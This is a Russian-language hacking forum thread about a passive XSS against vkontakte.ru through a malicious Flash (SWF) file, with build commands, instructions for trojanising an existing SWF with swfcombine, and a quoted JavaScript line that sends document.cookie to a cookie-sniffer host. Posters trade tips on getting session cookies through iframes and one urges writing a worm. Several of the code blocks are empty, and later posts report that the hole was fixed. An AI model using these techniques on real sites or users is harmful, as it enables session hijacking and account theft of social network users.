![]() |
vkontakte.ru passive xss (swf)
Качаем mtask
Создаём файлик hek.as с содержанием PHP код:
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.asСмотрим созданное "приложение" и выдираем ссылку на swf PHP код:
Применение: 1) Можно вставить в сорц похэканного сайта кодес PHP код:
2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump Код:
swfdump.exe hek.swfКод:
mtasc.exe -swf hek.swf -main -header x:y:z hek.asи вживляем Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swfСсылки по теме: http://tech.motion-twin.com/zip/mtasc-1.12.zip http://www.swftools.org/swftools-0.7.0.exe |
Фига Тох :)
+5 |
Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя... ;)
|
Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:
Код:
javascript:eval(String.fromCharCode(bla-bla-bla))Код:
img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie; |
Ха....ништяк, молодец
|
sniffer.php
PHP код:
PHP код:
|
Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит Код:
__utma=52566834.124252957.1203944691.1203944691.1206562305.2;%20__utmz=52566834.1203944691.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb=52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;%20pcls=1 |
Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte
|
Swf у меня не вызывается через ифрейм
|
гм у меня на опере вызывается
|
Проверил, только опера уважает ифрейм, остальные так не хотят
= |
ну значит надо сделать красивую флешку и давать ссылку на нее
|
Так тоже не получиться, потому что заголовок не дает прогрузиться, Тохег объяснил где и как ты её испытывал?
|
Эм... перепроверьте..
Фикс или я криворукий? ПРи первом переходе на свой свф показываются иероглифы...дальше уже 404 |
Фикс, буквально на 2-ой день. Свф с вредным кодом удаляется сразу
|
этож п*ц какая идс-ка там наверно стоит )
|
Имхо в идске есть баги и можно как-то криптануть наш код.......
|
Спустил в связи с https://forum.antichat.ru/threadedpost718472.html
|
не актуально, заметил, что у каждого пользователя своя ссылка на флэшку
|
Цитата:
|
Цитата:
|
Ну прописал полный путь к mtask.exe - не получилось (результат нигде не появился)
Пробывал полный путь ко всем файлвам - не получилось (результат нигде не появился) Как тогда компилить? И скажите: это еще актуально? |
Создай 1.bat , в каталоге с mtask.exe , и в батник впиши ету строчку ....
Запусти .... |
mtask - это трой?
|
Откомпелировал, загрузил... Я так понял он ворует куки? Куда он его сохраняет..?
|
Цитата:
|
Цитата:
а так, тут всё понятно: залей на диск программу, создай батник и впиши, то что в 1 посте. в соседней теме говорят убрали XSS... :mad: |
Да, прикрыли сегодня.
|
Цитата:
а почему бы не попробовать на mail.ru по крайней мере в опере олерты вылетают. ---- ваш злостный флудер xcedz ^_^ |
| Время: 00:18 |